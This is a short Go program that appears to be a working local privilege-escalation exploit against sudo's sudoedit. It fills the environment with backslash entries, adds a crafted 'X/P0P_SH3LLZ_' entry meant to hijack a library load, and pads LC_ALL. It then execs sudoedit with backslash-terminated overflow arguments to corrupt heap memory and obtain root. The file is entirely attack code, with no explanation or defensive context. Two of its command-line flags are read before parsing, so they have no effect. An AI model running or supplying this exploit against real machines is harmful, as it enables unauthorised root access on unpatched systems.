package main

import (
	"flag"
	"log"
	"runtime"
	"strings"
	"syscall"
)

func main() {
	var (
		smash_a        string
		smash_b        string
		null_stomp_len int
		lc_all_len     int
	)
	smash_len_a := flag.Int("smash_a", 50, "smash_len a")
	smash_len_b := flag.Int("smash_b", 60, "smash_len b")
	lc_all_len = *flag.Int("lc_all", 201, "lc_all length")
	null_stomp_len = *flag.Int("null", 69, "null_stomp_len")
	sudoedit_path := flag.String("t", "/usr/bin/sudoedit", "path to sudoedit")
	flag.Parse()

	// env
	var envp []string
	for i := 0; i < null_stomp_len; i++ {
		envp = append(envp, "\\")
	}
	envp = append(envp, "X/P0P_SH3LLZ_")
	envp = append(envp, "LC_ALL=C.UTF-8@"+strings.Repeat("C", lc_all_len))
	// envp = append(envp, "\x00")
	log.Print(envp)

	// smash
	smash_a = strings.Repeat("A", *smash_len_a) + "\\"
	smash_b = strings.Repeat("B", *smash_len_b) + "\\"

	// execve syscall
	runtime.LockOSThread()
	err := syscall.Exec(*sudoedit_path, []string{*sudoedit_path, "-n", "-s", smash_a, "\\", smash_b}, envp)
	if err != nil {
		log.Println(err)
	}

	return
}
